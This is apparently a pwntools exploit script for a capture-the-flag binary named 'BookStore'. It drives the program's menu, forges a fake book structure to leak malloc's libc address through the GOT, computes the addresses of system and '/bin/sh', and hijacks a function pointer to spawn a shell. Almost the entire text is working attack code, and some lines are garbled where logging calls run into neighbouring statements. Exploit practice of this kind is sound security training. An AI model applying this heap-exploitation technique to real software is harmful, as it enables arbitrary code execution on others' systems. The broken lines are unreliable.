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Created September 27, 2018 11:16
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from pwn import *
# import roputils
import time, re
# from libformatstr import *
context(arch='amd64', os='linux')
# context.log_level = 'DEBUG'
path = "./BookStore"
libc_path = "./"
libc_path = "/lib/x86_64-linux-gnu/"
binary = ELF(path)
# print binary.symbols
libc = ELF(libc_path)
if sys.argv[1] == 'r':
p = remote("", "8005")
if sys.argv[1] == 'p':
p = process([path], env={"LD_PRELOAD" : libc_path})
answer = lambda x: p.sendline(str(x))
banner = lambda : p.recvuntil("=====================") #logo
flag = False
def debug():
if flag:
def add(title, brief, ref_title, yn):
p.sendafter('Your choice:', '1\n')
p.sendafter('Title:', title + '\n')
p.sendafter('Enter brief size:', str(len(brief) + 1) + '\n')
p.sendafter('Enter brief:', brief + '\n')
p.sendafter('Reference book title:', ref_title + '\n')
p.sendafter('Best Selling? (Y/N)', yn + '\n')
return p.recvline()
def edit(old_title, new_title, brief, size, yn):
p.sendafter('Your choice:', '2\n')
p.sendafter('Old title:', old_title+'\n')
p.sendafter('New title:', new_title + '\n')
p.sendafter('Enter brief size:', str(size) + '\n')
p.sendafter('Enter brief:', brief)
p.sendafter('Best Selling? (Y/N)', yn + '\n')
return p.recvline()
def remove(title):
p.sendafter('Your choice:', '3\n')
p.sendafter('Title:', title + '\n')
return p.recvline()
def list():
p.sendafter('Your choice:', '4\n')
return banner()
# p.interactive()
malloc_got = 0x000000000601fd0
puts_plt = 0x000000000400908
strdup_plt = 0x000000000400980
bestSeller = 0x0000000006021F0
add('test3', '3'*8, 'testn', 'n')
add('test1', '1'*8, 'testn', 'y')
add('test2', '2'*8, 'testn', 'y')
edit('test1', 'test1', 'A' + '\x00' + '\n', 0x80, 'n')
fake_book = p64(0) + p64(malloc_got) + 'fake' * 8 + '\x00' + '\x01' + p64(strdup_plt)'Lenght\'s fake_book: ' + hex(len(fake_book)))
edit('test1', 'test1', fake_book, 0x3a, 'n')
malloc = u64(list().split('fake'*8 + '|')[1][:6].ljust(8, '\x00'))
base = malloc - 0x97070
system = base + 0x4f440
binsh = base + 0x1b3e9a'malloc: ' + hex(malloc))
edit('test3', 'test3', '3'*8, 8, 'y')
add('test4', '4'*8, 'testn', 'y')
edit('test3', 'test3', 'B' + '\x00' + '\n', 0x80, 'n')
fake_book2 = p64(0) + p64(binsh) + 'fake'*8 + '\x00' + '\x01' + p64(system)
edit('test3', 'test3', fake_book2, 0x3a, 'n')
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